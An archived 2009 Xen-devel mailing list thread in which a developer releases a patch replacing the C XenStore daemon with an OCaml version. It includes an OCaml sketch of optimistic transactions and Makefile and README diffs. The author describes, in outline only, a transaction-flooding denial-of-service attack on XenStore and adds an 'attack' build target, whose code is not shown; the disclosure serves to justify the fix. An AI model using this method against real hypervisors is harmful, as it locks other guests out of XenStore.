WARNING - OLD ARCHIVES

This is an archived copy of the Xen.org mailing list, which we have preserved to ensure that existing links to archives are not broken. The live archive, which contains the latest emails, can be found at http://lists.xen.org/
   
 
 
xen-devel

Re: [Xen-devel] OCaml XenStore

To: xen-devel@xxxxxxxxxxxxxxxxxxx
Subject: Re: [Xen-devel] OCaml XenStore
From: Patrick Colp <pjcolp@xxxxxxxxx>
Date: Thu, 15 Jan 2009 16:49:43 -0800
Cc: "Andrew Warfield \(cs\)" <andy@xxxxxxxxx>
Delivery-date: Thu, 15 Jan 2009 16:52:08 -0800
Envelope-to: www-data@xxxxxxxxxxxxxxxxxxx
In-reply-to: <493DB45B.2020509@xxxxxxxxx>
List-help: <mailto:xen-devel-request@lists.xensource.com?subject=help>
List-id: Xen developer discussion <xen-devel.lists.xensource.com>
List-post: <mailto:xen-devel@lists.xensource.com>
List-subscribe: <http://lists.xensource.com/mailman/listinfo/xen-devel>, <mailto:xen-devel-request@lists.xensource.com?subject=subscribe>
List-unsubscribe: <http://lists.xensource.com/mailman/listinfo/xen-devel>, <mailto:xen-devel-request@lists.xensource.com?subject=unsubscribe>
References: <49388712.70909@xxxxxxxxx> <493DB45B.2020509@xxxxxxxxx>
Sender: xen-devel-bounces@xxxxxxxxxxxxxxxxxxx
User-agent: Thunderbird 2.0.0.19 (X11/20090105)

After receiving some more feedback, I've fixed some more issues with the
build. This patch has been tested against the latest xen-unstable tip
(19043).


Patrick


Patrick Colp wrote:
A few issues with this release have been brought to my attention. The most important is an include file which was linked to a file in my build config rather than the system one. The other was the way I was handling socket connection shutdown. So I've fixed both of these and created a new patch which is against the current xen-unstable tip (18881).

Any additional comments would be greatly appreciated.


Patrick


Patrick Colp wrote:
Hello all,

A few months ago I released an OCaml version of XenStore. It was
basically just the C version but written in OCaml. Since then I've put a
lot of work into it and am ready to release the next version. The code
has been cleaned up a lot, modularised, and put into classes.

I've improved the transaction system to use optimistic concurrency
control with copy-on-write. I found that by repeatedly starting a
transaction, writing some data, and committing the transaction from a
guest domain, it was possible to mount a denial-of-service attack on
XenStore (this attack is included in the release). However, the same
attack run against this version of the OCaml XenStore does not prevent
other transactions from committing.
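
To illustrate the idea (this is only a minimal sketch, not the code in
the patch), optimistic concurrency control over a copy-on-write store
can be written in a few lines of OCaml. Every name below (store,
transaction, start, read, write, commit) is hypothetical, as are the
example paths. The sketch assumes that a conflict means "a path this
transaction touched was written by another commit after the transaction
started", and it leaves out deletes, permissions and watches.

```ocaml
(* Sketch only: all names here are hypothetical, not taken from the patch. *)
module StrMap = Map.Make (String)

(* Each path maps to its value and the generation of its last write. *)
type store = {
  mutable data : (string * int) StrMap.t;
  mutable generation : int;
}

type transaction = {
  start_gen : int;                          (* store generation at start *)
  mutable view : (string * int) StrMap.t;   (* private view of the store *)
  mutable touched : string list;            (* paths read or written *)
  mutable writes : (string * string) list;  (* pending writes, newest first *)
}

let create () = { data = StrMap.empty; generation = 0 }

(* Starting a transaction copies nothing: the immutable map is shared
   until the transaction writes, which is the copy-on-write part. *)
let start store =
  { start_gen = store.generation; view = store.data; touched = []; writes = [] }

let read tx path =
  tx.touched <- path :: tx.touched;
  Option.map fst (StrMap.find_opt path tx.view)

let write tx path value =
  tx.touched <- path :: tx.touched;
  tx.view <- StrMap.add path (value, tx.start_gen) tx.view;
  tx.writes <- (path, value) :: tx.writes

(* Optimistic commit: fail only if a touched path was written by another
   commit after this transaction started. *)
let commit store tx =
  let changed_since_start path =
    match StrMap.find_opt path store.data with
    | Some (_, gen) -> gen > tx.start_gen
    | None -> false
  in
  if List.exists changed_since_start tx.touched then false
  else begin
    store.generation <- store.generation + 1;
    List.iter
      (fun (path, value) ->
        store.data <- StrMap.add path (value, store.generation) store.data)
      (List.rev tx.writes);
    true
  end

let () =
  let store = create () in
  let victim = start store in
  write victim "/local/domain/1/name" "guest1";
  (* A second client hammers an unrelated path, as in the described attack. *)
  for i = 1 to 1000 do
    let tx = start store in
    write tx "/local/domain/2/data" (string_of_int i);
    ignore (commit store tx)
  done;
  Printf.printf "victim committed: %b\n" (commit store victim)
```

In this sketch the long-running transaction still commits, because none
of the 1000 intervening commits wrote a path it had touched. Two
transactions that write the same path would conflict, and the second one
to commit would be rejected and have to retry.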

I'm releasing it as a patch against the current tip (18847). It replaces
the C XenStore with the OCaml one. A tarball of the OCaml XenStore code
is also available on my website at:

http://cs.ubc.ca/~pjcolp/xenstore-ocaml.tar.bz2


Patrick


------------------------------------------------------------------------

_______________________________________________
Xen-devel mailing list
Xen-devel@xxxxxxxxxxxxxxxxxxx
http://lists.xensource.com/xen-devel



diff -r 10a8fae412c5 tools/xenstore/COPYING
--- a/tools/xenstore/COPYING    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,515 +0,0 @@
-This license (LGPL) applies to the xenstore library which interfaces
-with the xenstore daemon (as stated in xs.c, xs.h, xs_lib.c and
-xs_lib.h).  The remaining files in the directory are licensed as
-stated in the comments (as of this writing, GPL, see ../../COPYING).
-
-
-                  GNU LESSER GENERAL PUBLIC LICENSE
-                       Version 2.1, February 1999
-
- Copyright (C) 1991, 1999 Free Software Foundation, Inc.
-       51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-[This is the first released version of the Lesser GPL.  It also counts
- as the successor of the GNU Library Public License, version 2, hence
- the version number 2.1.]
-
-                            Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-Licenses are intended to guarantee your freedom to share and change
-free software--to make sure the software is free for all its users.
-
-  This license, the Lesser General Public License, applies to some
-specially designated software packages--typically libraries--of the
-Free Software Foundation and other authors who decide to use it.  You
-can use it too, but we suggest you first think carefully about whether
-this license or the ordinary General Public License is the better
-strategy to use in any particular case, based on the explanations
-below.
-
-  When we speak of free software, we are referring to freedom of use,
-not price.  Our General Public Licenses are designed to make sure that
-you have the freedom to distribute copies of free software (and charge
-for this service if you wish); that you receive source code or can get
-it if you want it; that you can change the software and use pieces of
-it in new free programs; and that you are informed that you can do
-these things.
-
-  To protect your rights, we need to make restrictions that forbid
-distributors to deny you these rights or to ask you to surrender these
-rights.  These restrictions translate to certain responsibilities for
-you if you distribute copies of the library or if you modify it.
-
-  For example, if you distribute copies of the library, whether gratis
-or for a fee, you must give the recipients all the rights that we gave
-you.  You must make sure that they, too, receive or can get the source
-code.  If you link other code with the library, you must provide
-complete object files to the recipients, so that they can relink them
-with the library after making changes to the library and recompiling
-it.  And you must show them these terms so they know their rights.
-
-  We protect your rights with a two-step method: (1) we copyright the
-library, and (2) we offer you this license, which gives you legal
-permission to copy, distribute and/or modify the library.
-
-  To protect each distributor, we want to make it very clear that
-there is no warranty for the free library.  Also, if the library is
-modified by someone else and passed on, the recipients should know
-that what they have is not the original version, so that the original
-author's reputation will not be affected by problems that might be
-introduced by others.
-
-  Finally, software patents pose a constant threat to the existence of
-any free program.  We wish to make sure that a company cannot
-effectively restrict the users of a free program by obtaining a
-restrictive license from a patent holder.  Therefore, we insist that
-any patent license obtained for a version of the library must be
-consistent with the full freedom of use specified in this license.
-
-  Most GNU software, including some libraries, is covered by the
-ordinary GNU General Public License.  This license, the GNU Lesser
-General Public License, applies to certain designated libraries, and
-is quite different from the ordinary General Public License.  We use
-this license for certain libraries in order to permit linking those
-libraries into non-free programs.
-
-  When a program is linked with a library, whether statically or using
-a shared library, the combination of the two is legally speaking a
-combined work, a derivative of the original library.  The ordinary
-General Public License therefore permits such linking only if the
-entire combination fits its criteria of freedom.  The Lesser General
-Public License permits more lax criteria for linking other code with
-the library.
-
-  We call this license the "Lesser" General Public License because it
-does Less to protect the user's freedom than the ordinary General
-Public License.  It also provides other free software developers Less
-of an advantage over competing non-free programs.  These disadvantages
-are the reason we use the ordinary General Public License for many
-libraries.  However, the Lesser license provides advantages in certain
-special circumstances.
-
-  For example, on rare occasions, there may be a special need to
-encourage the widest possible use of a certain library, so that it
-becomes a de-facto standard.  To achieve this, non-free programs must
-be allowed to use the library.  A more frequent case is that a free
-library does the same job as widely used non-free libraries.  In this
-case, there is little to gain by limiting the free library to free
-software only, so we use the Lesser General Public License.
-
-  In other cases, permission to use a particular library in non-free
-programs enables a greater number of people to use a large body of
-free software.  For example, permission to use the GNU C Library in
-non-free programs enables many more people to use the whole GNU
-operating system, as well as its variant, the GNU/Linux operating
-system.
-
-  Although the Lesser General Public License is Less protective of the
-users' freedom, it does ensure that the user of a program that is
-linked with the Library has the freedom and the wherewithal to run
-that program using a modified version of the Library.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.  Pay close attention to the difference between a
-"work based on the library" and a "work that uses the library".  The
-former contains code derived from the library, whereas the latter must
-be combined with the library in order to run.
-
-                  GNU LESSER GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License Agreement applies to any software library or other
-program which contains a notice placed by the copyright holder or
-other authorized party saying it may be distributed under the terms of
-this Lesser General Public License (also called "this License").
-Each licensee is addressed as "you".
-
-  A "library" means a collection of software functions and/or data
-prepared so as to be conveniently linked with application programs
-(which use some of those functions and data) to form executables.
-
-  The "Library", below, refers to any such software library or work
-which has been distributed under these terms.  A "work based on the
-Library" means either the Library or any derivative work under
-copyright law: that is to say, a work containing the Library or a
-portion of it, either verbatim or with modifications and/or translated
-straightforwardly into another language.  (Hereinafter, translation is
-included without limitation in the term "modification".)
-
-  "Source code" for a work means the preferred form of the work for
-making modifications to it.  For a library, complete source code means
-all the source code for all modules it contains, plus any associated
-interface definition files, plus the scripts used to control
-compilation and installation of the library.
-
-  Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running a program using the Library is not restricted, and output from
-such a program is covered only if its contents constitute a work based
-on the Library (independent of the use of the Library in a tool for
-writing it).  Whether that is true depends on what the Library does
-and what the program that uses the Library does.
-
-  1. You may copy and distribute verbatim copies of the Library's
-complete source code as you receive it, in any medium, provided that
-you conspicuously and appropriately publish on each copy an
-appropriate copyright notice and disclaimer of warranty; keep intact
-all the notices that refer to this License and to the absence of any
-warranty; and distribute a copy of this License along with the
-Library.
-
-  You may charge a fee for the physical act of transferring a copy,
-and you may at your option offer warranty protection in exchange for a
-fee.
-
-  2. You may modify your copy or copies of the Library or any portion
-of it, thus forming a work based on the Library, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) The modified work must itself be a software library.
-
-    b) You must cause the files modified to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    c) You must cause the whole of the work to be licensed at no
-    charge to all third parties under the terms of this License.
-
-    d) If a facility in the modified Library refers to a function or a
-    table of data to be supplied by an application program that uses
-    the facility, other than as an argument passed when the facility
-    is invoked, then you must make a good faith effort to ensure that,
-    in the event an application does not supply such function or
-    table, the facility still operates, and performs whatever part of
-    its purpose remains meaningful.
-
-    (For example, a function in a library to compute square roots has
-    a purpose that is entirely well-defined independent of the
-    application.  Therefore, Subsection 2d requires that any
-    application-supplied function or table used by this function must
-    be optional: if the application does not supply it, the square
-    root function must still compute square roots.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Library,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Library, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote
-it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Library.
-
-In addition, mere aggregation of another work not based on the Library
-with the Library (or with a work based on the Library) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may opt to apply the terms of the ordinary GNU General Public
-License instead of this License to a given copy of the Library.  To do
-this, you must alter all the notices that refer to this License, so
-that they refer to the ordinary GNU General Public License, version 2,
-instead of to this License.  (If a newer version than version 2 of the
-ordinary GNU General Public License has appeared, then you can specify
-that version instead if you wish.)  Do not make any other change in
-these notices.
-
-  Once this change is made in a given copy, it is irreversible for
-that copy, so the ordinary GNU General Public License applies to all
-subsequent copies and derivative works made from that copy.
-
-  This option is useful when you wish to copy part of the code of
-the Library into a program that is not a library.
-
-  4. You may copy and distribute the Library (or a portion or
-derivative of it, under Section 2) in object code or executable form
-under the terms of Sections 1 and 2 above provided that you accompany
-it with the complete corresponding machine-readable source code, which
-must be distributed under the terms of Sections 1 and 2 above on a
-medium customarily used for software interchange.
-
-  If distribution of object code is made by offering access to copy
-from a designated place, then offering equivalent access to copy the
-source code from the same place satisfies the requirement to
-distribute the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  5. A program that contains no derivative of any portion of the
-Library, but is designed to work with the Library by being compiled or
-linked with it, is called a "work that uses the Library".  Such a
-work, in isolation, is not a derivative work of the Library, and
-therefore falls outside the scope of this License.
-
-  However, linking a "work that uses the Library" with the Library
-creates an executable that is a derivative of the Library (because it
-contains portions of the Library), rather than a "work that uses the
-library".  The executable is therefore covered by this License.
-Section 6 states terms for distribution of such executables.
-
-  When a "work that uses the Library" uses material from a header file
-that is part of the Library, the object code for the work may be a
-derivative work of the Library even though the source code is not.
-Whether this is true is especially significant if the work can be
-linked without the Library, or if the work is itself a library.  The
-threshold for this to be true is not precisely defined by law.
-
-  If such an object file uses only numerical parameters, data
-structure layouts and accessors, and small macros and small inline
-functions (ten lines or less in length), then the use of the object
-file is unrestricted, regardless of whether it is legally a derivative
-work.  (Executables containing this object code plus portions of the
-Library will still fall under Section 6.)
-
-  Otherwise, if the work is a derivative of the Library, you may
-distribute the object code for the work under the terms of Section 6.
-Any executables containing that work also fall under Section 6,
-whether or not they are linked directly with the Library itself.
-
-  6. As an exception to the Sections above, you may also combine or
-link a "work that uses the Library" with the Library to produce a
-work containing portions of the Library, and distribute that work
-under terms of your choice, provided that the terms permit
-modification of the work for the customer's own use and reverse
-engineering for debugging such modifications.
-
-  You must give prominent notice with each copy of the work that the
-Library is used in it and that the Library and its use are covered by
-this License.  You must supply a copy of this License.  If the work
-during execution displays copyright notices, you must include the
-copyright notice for the Library among them, as well as a reference
-directing the user to the copy of this License.  Also, you must do one
-of these things:
-
-    a) Accompany the work with the complete corresponding
-    machine-readable source code for the Library including whatever
-    changes were used in the work (which must be distributed under
-    Sections 1 and 2 above); and, if the work is an executable linked
-    with the Library, with the complete machine-readable "work that
-    uses the Library", as object code and/or source code, so that the
-    user can modify the Library and then relink to produce a modified
-    executable containing the modified Library.  (It is understood
-    that the user who changes the contents of definitions files in the
-    Library will not necessarily be able to recompile the application
-    to use the modified definitions.)
-
-    b) Use a suitable shared library mechanism for linking with the
-    Library.  A suitable mechanism is one that (1) uses at run time a
-    copy of the library already present on the user's computer system,
-    rather than copying library functions into the executable, and (2)
-    will operate properly with a modified version of the library, if
-    the user installs one, as long as the modified version is
-    interface-compatible with the version that the work was made with.
-
-    c) Accompany the work with a written offer, valid for at least
-    three years, to give the same user the materials specified in
-    Subsection 6a, above, for a charge no more than the cost of
-    performing this distribution.
-
-    d) If distribution of the work is made by offering access to copy
-    from a designated place, offer equivalent access to copy the above
-    specified materials from the same place.
-
-    e) Verify that the user has already received a copy of these
-    materials or that you have already sent this user a copy.
-
-  For an executable, the required form of the "work that uses the
-Library" must include any data and utility programs needed for
-reproducing the executable from it.  However, as a special exception,
-the materials to be distributed need not include anything that is
-normally distributed (in either source or binary form) with the major
-components (compiler, kernel, and so on) of the operating system on
-which the executable runs, unless that component itself accompanies
-the executable.
-
-  It may happen that this requirement contradicts the license
-restrictions of other proprietary libraries that do not normally
-accompany the operating system.  Such a contradiction means you cannot
-use both them and the Library together in an executable that you
-distribute.
-
-  7. You may place library facilities that are a work based on the
-Library side-by-side in a single library together with other library
-facilities not covered by this License, and distribute such a combined
-library, provided that the separate distribution of the work based on
-the Library and of the other library facilities is otherwise
-permitted, and provided that you do these two things:
-
-    a) Accompany the combined library with a copy of the same work
-    based on the Library, uncombined with any other library
-    facilities.  This must be distributed under the terms of the
-    Sections above.
-
-    b) Give prominent notice with the combined library of the fact
-    that part of it is a work based on the Library, and explaining
-    where to find the accompanying uncombined form of the same work.
-
-  8. You may not copy, modify, sublicense, link with, or distribute
-the Library except as expressly provided under this License.  Any
-attempt otherwise to copy, modify, sublicense, link with, or
-distribute the Library is void, and will automatically terminate your
-rights under this License.  However, parties who have received copies,
-or rights, from you under this License will not have their licenses
-terminated so long as such parties remain in full compliance.
-
-  9. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Library or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Library (or any work based on the
-Library), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Library or works based on it.
-
-  10. Each time you redistribute the Library (or any work based on the
-Library), the recipient automatically receives a license from the
-original licensor to copy, distribute, link with or modify the Library
-subject to these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties with
-this License.
-
-  11. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Library at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Library by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Library.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply, and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  12. If the distribution and/or use of the Library is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Library under this License
-may add an explicit geographical distribution limitation excluding those
-countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  13. The Free Software Foundation may publish revised and/or new
-versions of the Lesser General Public License from time to time.
-Such new versions will be similar in spirit to the present version,
-but may differ in detail to address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Library
-specifies a version number of this License which applies to it and
-"any later version", you have the option of following the terms and
-conditions either of that version or of any later version published by
-the Free Software Foundation.  If the Library does not specify a
-license version number, you may choose any version ever published by
-the Free Software Foundation.
-
-  14. If you wish to incorporate parts of the Library into other free
-programs whose distribution conditions are incompatible with these,
-write to the author to ask for permission.  For software which is
-copyrighted by the Free Software Foundation, write to the Free
-Software Foundation; we sometimes make exceptions for this.  Our
-decision will be guided by the two goals of preserving the free status
-of all derivatives of our free software and of promoting the sharing
-and reuse of software generally.
-
-                            NO WARRANTY
-
-  15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
-WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
-EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
-OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
-KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
-LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
-THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
-WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
-AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
-FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
-CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
-LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
-RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
-FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
-SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
-DAMAGES.
-
-                     END OF TERMS AND CONDITIONS
-
-           How to Apply These Terms to Your New Libraries
-
-  If you develop a new library, and you want it to be of the greatest
-possible use to the public, we recommend making it free software that
-everyone can redistribute and change.  You can do so by permitting
-redistribution under these terms (or, alternatively, under the terms
-of the ordinary General Public License).
-
-  To apply these terms, attach the following notices to the library.
-It is safest to attach them to the start of each source file to most
-effectively convey the exclusion of warranty; and each file should
-have at least the "copyright" line and a pointer to where the full
-notice is found.
-
-
-    <one line to give the library's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This library is free software; you can redistribute it and/or
-    modify it under the terms of the GNU Lesser General Public
-    License as published by the Free Software Foundation; either
-    version 2.1 of the License, or (at your option) any later version.
-
-    This library is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-    Lesser General Public License for more details.
-
-    You should have received a copy of the GNU Lesser General Public
-    License along with this library; if not, write to the Free Software
-    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
-Also add information on how to contact you by electronic and paper mail.
-
-You should also get your employer (if you work as a programmer) or
-your school, if any, to sign a "copyright disclaimer" for the library,
-if necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the
-  library `Frob' (a library for tweaking knobs) written by James
-  Random Hacker.
-
-  <signature of Ty Coon>, 1 April 1990
-  Ty Coon, President of Vice
-
-That's all there is to it!
-
-
diff -r 10a8fae412c5 tools/xenstore/Makefile
--- a/tools/xenstore/Makefile   Wed Jan 14 13:43:17 2009 +0000
+++ b/tools/xenstore/Makefile   Thu Jan 15 15:44:05 2009 -0800
@@ -8,16 +8,55 @@
 CFLAGS += -I.
 CFLAGS += $(CFLAGS_libxenctrl)
 
+
+CAMLLIB = $(shell ocamlc -where)
+DEF_CPPFLAGS += -I$(CAMLLIB)
+
+OCAMLFIND=ocamlfind
+OCAMLOPT=ocamlopt
+
+
+INCLUDES := -I .
+OCAML_LIBS := unix.cmxa
+C_LIBS := $(LDFLAGS_libxenctrl) -lpthread -lc
+
+OBJS := constants.cmx utils.cmx eventchan.cmx interface.cmx xenbus.cmx socket.cmx message.cmx connection.cmx dominfo.cmx trace.cmx store.cmx domain.cmx os.cmx option.cmx watch.cmx permission.cmx transaction.cmx xenstored.cmx process.cmx main.cmx
+C_OBJS := xenbus_c.o eventchan_c.o dominfo_c.o main_c.o
+
+ATTACK_OBJS := constants.cmx utils.cmx interface.cmx socket.cmx message.cmx connection.cmx store.cmx attack.cmx
+
+
+# Build rules
+
+.PHONY: all default clean
+
+all: xenstored attack libxenstore.so libxenstore.a clients
+default: all
+
+
+# Source build rules
+
+%.cmx: %.ml
+       $(OCAMLFIND) $(OCAMLOPT) $(INCLUDES) -c $< -o $@
+
+%.o: %.c
+       $(CC) $(CFLAGS) -I$(CAMLLIB) -c $< -o $@
+
+
+# Executable build rules
+
+xenstored: $(OBJS) $(C_OBJS)
+       $(OCAMLFIND) $(OCAMLOPT) -o xenstored $(OCAML_LIBS) $(OBJS) $(C_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
+attack: $(ATTACK_OBJS)
+       $(OCAMLFIND) $(OCAMLOPT) unix.cmxa -o attack $(ATTACK_OBJS) -ccopt '$(CFLAGS)' -cclib '$(C_LIBS)' -cclib '$(LDFLAGS)'
+
+
 CLIENTS := xenstore-exists xenstore-list xenstore-read xenstore-rm xenstore-chmod
 CLIENTS += xenstore-write xenstore-ls
 
-XENSTORED_OBJS = xenstored_core.o xenstored_watch.o xenstored_domain.o xenstored_transaction.o xs_lib.o talloc.o utils.o tdb.o hashtable.o
-
-XENSTORED_OBJS_$(CONFIG_Linux) = xenstored_linux.o
-XENSTORED_OBJS_$(CONFIG_SunOS) = xenstored_solaris.o xenstored_probes.o
-XENSTORED_OBJS_$(CONFIG_NetBSD) = xenstored_netbsd.o
-
-XENSTORED_OBJS += $(XENSTORED_OBJS_y)
+XENSTORED_OBJS = xs_lib.o
 
 ifneq ($(XENSTORE_STATIC_CLIENTS),y)
 LIBXENSTORE := libxenstore.so
@@ -26,26 +65,10 @@
 xenstore xenstore-control: CFLAGS += -static
 endif
 
-.PHONY: all
-all: libxenstore.so libxenstore.a xenstored clients xs_tdb_dump 
 
 .PHONY: clients
 clients: xenstore $(CLIENTS) xenstore-control
 
-ifeq ($(CONFIG_SunOS),y)
-xenstored_probes.h: xenstored_probes.d
-       dtrace -C -h -s xenstored_probes.d
-
-xenstored_solaris.o: xenstored_probes.h
-
-xenstored_probes.o: xenstored_solaris.o
-       dtrace -C -G -s xenstored_probes.d xenstored_solaris.o 
-
-CFLAGS += -DHAVE_DTRACE=1
-endif
- 
-xenstored: $(XENSTORED_OBJS)
-       $(CC) $(CFLAGS) $(LDFLAGS) $^ $(LDFLAGS_libxenctrl) $(SOCKET_LIBS) -o $@
 
 $(CLIENTS): xenstore
        ln -f xenstore $@
@@ -56,8 +79,6 @@
 xenstore-control: xenstore_control.o $(LIBXENSTORE)
        $(CC) $(CFLAGS) $(LDFLAGS) $< -L. -lxenstore $(SOCKET_LIBS) -o $@
 
-xs_tdb_dump: xs_tdb_dump.o utils.o tdb.o talloc.o
-       $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@
 
 libxenstore.so: libxenstore.so.$(MAJOR)
        ln -sf $< $@
@@ -72,13 +93,25 @@
 libxenstore.a: xs.o xs_lib.o
        $(AR) rcs $@ $^
 
+
+# Cleaning rules
+
 .PHONY: clean
-clean:
+clean: clean-xenstored clean-attack clean-xs
+
+clean-xenstored:
+       rm -f *.a *.o *.cmx *.cmi xenstored
+
+clean-attack:
+       rm -f *.a *.o *.cmx *.cmi attack
+
+clean-xs:
        rm -f *.a *.o *.opic *.so* xenstored_probes.h
-       rm -f xenstored xs_random xs_stress xs_crashme
-       rm -f xs_tdb_dump xenstore-control
+       rm -f xs_random xs_stress xs_crashme
+       rm -f xenstore-control
        rm -f xenstore $(CLIENTS)
        $(RM) $(DEPS)
+
 
 .PHONY: TAGS
 TAGS:
@@ -88,13 +121,13 @@
 tarball: clean
        cd .. && tar -c -j -v -h -f xenstore.tar.bz2 xenstore/
 
+
+# Install rules
+
 .PHONY: install
 install: all
-       $(INSTALL_DIR) $(DESTDIR)/var/run/xenstored
-       $(INSTALL_DIR) $(DESTDIR)/var/lib/xenstored
        $(INSTALL_DIR) $(DESTDIR)$(BINDIR)
        $(INSTALL_DIR) $(DESTDIR)$(SBINDIR)
-       $(INSTALL_DIR) $(DESTDIR)$(INCLUDEDIR)
        $(INSTALL_PROG) xenstored $(DESTDIR)$(SBINDIR)
        $(INSTALL_PROG) xenstore-control $(DESTDIR)$(BINDIR)
        $(INSTALL_PROG) xenstore $(DESTDIR)/usr/bin
@@ -109,6 +142,7 @@
        $(INSTALL_DATA) xs.h $(DESTDIR)$(INCLUDEDIR)
        $(INSTALL_DATA) xs_lib.h $(DESTDIR)$(INCLUDEDIR)
 
+
 -include $(DEPS)
 
 # never delete any intermediate files.
diff -r 10a8fae412c5 tools/xenstore/README
--- a/tools/xenstore/README     Wed Jan 14 13:43:17 2009 +0000
+++ b/tools/xenstore/README     Thu Jan 15 15:44:05 2009 -0800
@@ -1,5 +1,41 @@
-The following files are imported from the Samba project.  We use the versions
-from Samba 3, the current stable branch.
+OCaml XenStore
 
-talloc.c: samba-trunk/source/lib/talloc.c     r14291 2006-03-13 04:27:47 +0000
-talloc.h: samba-trunk/source/include/talloc.h r11986 2005-12-01 00:43:36 +0000
+
+This is the second version of the OCaml XenStore daemon. It is functionally
+equivalent to the C XenStore daemon, except that three message operations are
+unimplemented: DEBUG, RESUME, and SET_TARGET. I have suggested that these are
+unneeded anyway in the new version of the XenStore protocol.
+
+Due to some broken tools, a hack was added to support values in non-leaf nodes.
+It can be found under the Hack type of Node in the Store. Ideally the tools
+would be fixed so that there is no need for the hack.
+
+The trace and verbose output has been changed slightly to show the domain ID
+instead of a hex address. For socket connections, a negative domain ID is used.
+
+Transactions have been improved to use optimistic concurrency control and
+copy-on-write (instead of duplicating the entire store). A denial-of-service
+attack has been included in the build. When run against the current version
+of XenStore it will prevent any transaction from completing, thus effectively
+locking out XenStore. However, using the improved transaction implementation
+in the OCaml XenStore, this attack no longer succeeds.
+
+
+The development environment was 32-bit Ubuntu 8.10 with the stock OCaml package
+version 3.10.2. It has been tested on Ubuntu 8.04 with the latest version of
+xen-unstable and OCaml version 3.10.0.
+
+
+
+To compile xenstored, the attack, and the libxenstore libraries simply type:
+
+# make
+
+To install, type:
+
+# make install
+
+
